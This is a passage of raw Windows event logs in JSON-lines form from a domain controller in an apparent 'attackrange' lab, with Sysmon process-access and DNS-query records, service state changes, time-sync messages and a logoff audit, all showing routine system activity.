05:47:13.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2661,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76833,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The NcaSvc service entered the stopped state.","param1":"NcaSvc","param2":"stopped","EventReceivedTime":"2020-08-01 05:47:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2662,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:11.767\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:11.767","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2663,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:11.984\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010E7C30000}\r\nProcessId: 1220\r\nQueryName: attackrange.local\r\nQueryStatus: 9502\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:11.984","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010E7C30000}","QueryName":"attackrange.local","QueryStatus":"9502","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2664,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.012\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nProcessId: 1144\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::10bc:13e3:f5ff:fef1;2001:0:34f1:8072:10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.012","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::10bc:13e3:f5ff:fef1;2001:0:34f1:8072:10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2665,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.269\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.269","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2666,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.276\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nProcessId: 2688\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::10bc:13e3:f5ff:fef1;2001:0:34f1:8072:10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.276","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001014BB0200}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::10bc:13e3:f5ff:fef1;2001:0:34f1:8072:10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 05:47:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2667,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.279\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-881393.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.279","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  2 win-dc-881393.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76834,"ProcessID":1224,"ThreadID":2000,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 05:47:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":144,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76835,"ProcessID":1224,"ThreadID":2000,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has stopped advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:47:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":35,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76836,"ProcessID":1224,"ThreadID":2000,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service is now synchronizing the system time with the time source time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 05:47:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76837,"ProcessID":856,"ThreadID":1128,"Channel":"System","Message":"The DsmSvc service entered the stopped state.","param1":"DsmSvc","param2":"stopped","EventReceivedTime":"2020-08-01 05:47:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220400,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A9EA\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4a9ea","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2668,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2669,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2670,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2228\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-00101ED30400}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2228","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-00101ED30400}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\